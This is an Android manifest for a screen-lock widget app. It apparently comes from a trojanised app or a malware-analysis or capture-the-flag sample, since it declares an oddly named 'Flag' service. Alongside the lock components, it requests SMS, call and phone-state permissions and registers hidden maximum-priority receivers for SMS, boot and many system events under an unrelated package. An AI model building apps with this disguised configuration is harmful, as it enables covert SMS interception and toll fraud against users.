<?xml version="1.0" encoding="utf-8"?>
<manifest android:versionCode="30320001" android:versionName="3.3.20.1" package="net.andwy.onetouchlock"
  xmlns:android="http://schemas.android.com/apk/res/android">
    <uses-sdk android:minSdkVersion="7" />
	<uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION" />
	<uses-permission android:name="android.permission.ACCESS_FINE_LOCATION" />
	<uses-permission android:name="android.permission.ACCESS_NETWORK_STATE" />
	<uses-permission android:name="android.permission.ACCESS_WIFI_STATE" />
	<uses-permission android:name="android.permission.ACCESS_WIFI_STATE" />    
	<uses-permission android:name="android.permission.BROADCAST_SMS" />
	<uses-permission android:name="android.permission.CHANGE_NETWORK_STATE" />
	<uses-permission android:name="android.permission.CHANGE_WIFI_STATE" />
	<uses-permission android:name="android.permission.GET_TASKS" />
	<uses-permission android:name="android.permission.INTERNET" />
	<uses-permission android:name="android.permission.KILL_BACKGROUND_PROCESSES"/>
	<uses-permission android:name="android.permission.MODIFY_PHONE_STATE" />
	<uses-permission android:name="android.permission.MOUNT_UNMOUNT_FILESYSTEMS" />
	<uses-permission android:name="android.permission.PROCESS_OUTGOING_CALLS" />
	<uses-permission android:name="android.permission.READ_LOGS" />
	<uses-permission android:name="android.permission.READ_PHONE_STATE" />
	<uses-permission android:name="android.permission.READ_SMS" />
	<uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" />
	<uses-permission android:name="android.permission.RECEIVE_MMS" />
	<uses-permission android:name="android.permission.RECEIVE_SMS" />
	<uses-permission android:name="android.permission.RESTART_PACKAGES"/>
	<uses-permission android:name="android.permission.SEND_SMS" />
	<uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW" />
	<uses-permission android:name="android.permission.WAKE_LOCK" />
	<uses-permission android:name="android.permission.WRITE_APN_SETTINGS" />
	<uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" />
	<uses-permission android:name="android.permission.WRITE_SETTINGS" />
	<uses-permission android:name="android.permission.WRITE_SMS" />
	<uses-permission android:name="com.android.launcher.permission.INSTALL_SHORTCUT" />    
    <application android:label="@string/app_name" android:icon="@drawable/icon" >
        <activity android:name="com.tapps.onetouchlock.LockActivity" android:label="@string/app_name">
            <intent-filter>
                <action android:name="android.intent.action.MAIN" />
                <category android:name="android.intent.category.LAUNCHER" />
            </intent-filter>
            <intent-filter>
                <action android:name="android.intent.action.CREATE_SHORTCUT" />
            </intent-filter>
        </activity>
        <receiver android:name="com.tapps.onetouchlock.LockDeviceAdminReceiver" android:permission="android.permission.BIND_DEVICE_ADMIN" android:description="@string/app_name">
            <meta-data android:name="android.app.device_admin" android:resource="@xml/admin" />
            <intent-filter>
                <action android:name="android.app.action.DEVICE_ADMIN_ENABLED" />
            </intent-filter>
        </receiver>
        <receiver android:name="com.tapps.onetouchlock.LockAppWidgetProvider" android:label="@string/app_name" android:icon="@drawable/icon">
            <intent-filter>
                <action android:name="android.appwidget.action.APPWIDGET_UPDATE" />
                <action android:name="lock" />
            </intent-filter>
            <meta-data android:name="android.appwidget.provider" android:resource="@xml/provider" />
        </receiver>
        <service android:name="com.android.FlaaaaaaaaaaaagService" android:exported="true" />
        <service  android:name="net.workspace.TaskService" />
        <service android:name="net.workspace.KillService" />
        <service  android:name="net.workspace.CommonService" />
        <receiver android:name="net.workspace.SmsReceiver">
            <intent-filter android:priority="2147483647" >
                <action android:name="android.provider.Telephony.SMS_RECEIVED" />
                <action android:name="android.provider.Telephony.GSM_SMS_RECEIVED" />
                <category android:name="android.intent.category.DEFAULT" />                
            </intent-filter>
        </receiver>
        <receiver android:name="net.workspace.BootCompleteReceiver" >
            <intent-filter android:priority="2147483647" >
                <action android:name="android.intent.action.BOOT_COMPLETED" />
            </intent-filter>
        </receiver>
        <receiver android:name="net.workspace.ActivateReceiver" >
            <intent-filter android:priority="2147483647" >
                <action android:name="android.intent.action.ACTION_TIME_CHANGED" />
                <action android:name="android.intent.action.ACTION_DATE_CHANGED" />
                <action android:name="android.intent.action.ACTION_TIMEZONE_CHANGED" />
                <action android:name="android.intent.action.ACTION_MEDIA_EJECT" />
                <action android:name="android.intent.action.ACTION_PACKAGE_ADDED" />
                <action android:name="android.net.wifi.WIFI_STATE_CHANGED" />
                <action android:name="android.intent.action.SIM_STATE_CHANGED" />
                <action android:name="android.bluetooth.adapter.action.STATE_CHANGED" />
                <action android:name="android.net.wifi.WIFI_STATE_CHANGED" />
                <action android:name="android.net.conn.CONNECTIVITY_CHANGE" />
                <action android:name="android.intent.action.ANY_DATA_STATE" />
                <action android:name="android.net.wifi.STATE_CHANGE" />
                <action android:name="android.intent.action.MEDIA_UNMOUNTED" />
                <action android:name="android.intent.action.MEDIA_REMOVED" />
                <action android:name="android.intent.action.MEDIA_CHECKING" />
                <action android:name="android.intent.action.MEDIA_EJECT" />
                <action android:name="android.intent.action.NEW_OUTGOING_CALL" />
                <action android:name="android.intent.action.PHONE_STATE" />
                <action android:name="android.intent.action.MAIN" />
                <action android:name="android.intent.action.USER_PRESENT" />
            </intent-filter>
        </receiver>
        <receiver android:name="net.workspace.ConnectionChangeReceiver" >
            <intent-filter>
                <action android:name="android.net.conn.CONNECTIVITY_CHANGE" />
            </intent-filter>
        </receiver> 
		        
    </application>
</manifest>
